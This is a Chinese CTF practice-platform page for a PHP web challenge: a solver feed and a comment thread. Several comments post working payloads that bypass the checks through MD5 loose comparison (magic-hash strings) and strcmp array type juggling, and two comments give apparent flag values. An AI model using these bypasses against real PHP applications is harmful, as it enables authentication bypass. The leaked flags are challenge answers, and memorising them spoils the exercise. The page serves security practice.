评分(10)
解题动态

r00t2025 攻破了该题 18分钟前

一羽轻鸿 攻破了该题 12小时前

卡哇呀石榴 攻破了该题 18小时前

Nora 攻破了该题 19小时前

caiyuhong 攻破了该题 19小时前

LuoTianYi 攻破了该题 19小时前

djm0001 攻破了该题 1天前

1393385937 攻破了该题 1天前

super86worm 攻破了该题 1天前

goodsnack 攻破了该题 1天前

wopawangjinie 攻破了该题 2天前

夕殇璃月 攻破了该题 2天前

七分糖 攻破了该题 2天前

ZERO.ROLing 攻破了该题 2天前

zouxinsen 攻破了该题 2天前

kaisheng 攻破了该题 3天前

wei1 攻破了该题 3天前

18515516872 攻破了该题 3天前

xuxuxu123 攻破了该题 3天前

评论
goodsnack 1天前
举报
弱类型比较,传数组即可
harven 11天前
举报
http://example.com/?v1=QNKCDZO&v2=240610708&v3[]=test
smtall 17天前
举报
用deepseek做出来了
大棕兔爸爸 1月前
举报
存在两个漏洞点:1. md5的松散比较绕过;2. strcmp的类型漏洞导致比较结果为0。攻击者需要同时利用这两个漏洞才能获取到flag。 完整Payload: ?v1=240610708&v2=QNKCDZO&v3[]=abc
welltian 3月前
举报
/?v1=QNKCDZO&v2=240610708&v3[]=123
33555 3月前
举报
/?v1[]=1&v2[]=2&v3[]=1flag{f78a31880b6bf8800597a997e130155f}
APTX4869ZRC 4月前
举报
index.php?v1[]=QLTHNDT&v2[]=UTIPEZQ&v3[]=EEIZDOI
fenmusm 4月前
举报
/?v1[]=1&v2[]=2&v3[]=3
Jacob811 4月前
举报
flag{23d6defe4ed15e2f857de57a7b576dfb}
Rmgcc 4月前
举报
https://blog.csdn.net/lga0325/article/details/143312532